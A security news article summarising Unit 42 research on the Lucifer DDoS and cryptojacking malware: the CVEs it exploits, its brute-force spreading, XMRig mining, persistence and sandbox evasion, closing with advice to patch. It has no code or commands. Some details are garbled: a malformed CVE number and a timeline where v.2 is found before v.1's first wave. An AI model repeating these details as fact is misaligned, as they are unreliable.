The Lucifer malware
A new powerful DDoS and cryptojacking malware named Lucifer exploits numerous vulnerabilities to infect Windows computers. This malware is part of an ongoing campaign against Windows hosts. In its latest wave of attacks, Lucifer uses a variety of weaponized weaknesses.
In a post from Wednesday, Palo Alto Networks’ Unit 42 explains that the creators of the malware have called their invention Satan DDoS, but since another malware named Satan Ransomware already exists, the researchers preferred to give a specific pseudonym of the new malware.
On 10 June, the first attack wave with Lucifer v.1 was detected. The malware was updated to v.2, a day later, and literally wrecked havoc on target computers. Sadly, by now, the attacks have not resumed.
The latest variant of Lucifer v.2 was discovered on 29 May during an investigation of the exploit of CVE-19-1881, a bug in Laravel Framework which could be misused to execute remote code (RCE) attacks. Further examination showed that the investigated vulnerability is just one of the many flaws that the malware uses, depending on which version of Lucifer – one or two – comes into operation.
The exhaustive list of vulnerabilities that this malware targets includes CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464. They all have either “high” or “critical” ratings since, once exploited, the attacker can execute arbitrary commands on the compromised device through them.
Fortunately, patches have been released for all reported security flaws. However, hosts that have not updated to the available patches may experience trivial attacks, the ultimate goals of which, in most cases is the execution for cryptocurrency mining code.
Lucifer is known to be a potent hybrid malware that can cryptojack and manipulate compromised computers to carry out DDoS attacks. The malware scans open ports 135 (RPC) and 1433(MSSQL) for targets and uses credential-stuffing attacks to access them. The researchers have said that the malware may infect its targets via IPC, WMI, SMB, and FTP through brute force attacks, as well as MSSQL, RPC, and network sharing. The malware drops XMRig, a program used to mine for the Monero (XMR) cryptocurrency, once it has been established on an infected machine. Lucifer can also connect to a command-and -control (C2) server to be issued commands such as launching a DDoS attacks, stealing or transferring device data, and notifying its malicious operators of Monero’s cryptocurrency miner status.
To spread, Lucifer uses a variety of vulnerabilities and brute-force attacks that help it to jeopardize additional hosts linked to the original infected device. The researchers inform that the malware targets Windows hosting devices both on the Internet and on the Intranet because the intruder uses a certutil utility in the payload to spread the malware. The malware will also alter your Windows registry to set itself as a startup process. It will also drop EternalBlue, EternalRomance and DoublePulsar backdoors to establish persistence. Through checking the existence of sandboxes or virtual machines, Lucifer is often attempting to avoid detection or reverse engineering. If it finds any, the malware begins a “infinite loop” that prevents operating activities..
In conclusion, researchers say that Lucifer is the latest hybrid of DDoS and cryptojacking malware that exploits old weaknesses in Windows to carry out malicious activities. Therefore, they recommend users to apply all the updates and recently released Windows patches to have a better chance to protect against this infection.